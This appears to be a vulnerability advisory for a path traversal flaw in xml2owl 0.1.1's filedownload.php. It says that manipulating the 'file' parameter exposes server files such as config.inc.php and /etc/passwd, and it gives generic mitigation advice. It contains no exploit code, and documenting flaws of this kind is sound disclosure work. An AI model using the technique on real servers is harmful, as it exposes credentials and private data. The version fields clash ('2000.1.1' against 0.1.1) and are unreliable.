vendor: xml2owl
by: Unknown
CVSS: 7.5 HIGH
Remote File Disclosure
CWE: 22
Product Name: xml2owl
Affected Version From: 2000.1.1
Affected Version To: 2000.1.1
Patch Exists: NO
Related CWE:
CPE: xml2owl
Platforms Tested:
2007
xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability
The vulnerability allows remote attackers to disclose sensitive information by exploiting the filedownload.php script. By manipulating the 'file' parameter, an attacker can access arbitrary files on the server, such as config.inc.php or /etc/passwd.
Mitigation:
The vulnerability can be mitigated by properly validating user input and implementing security controls to restrict access to sensitive files.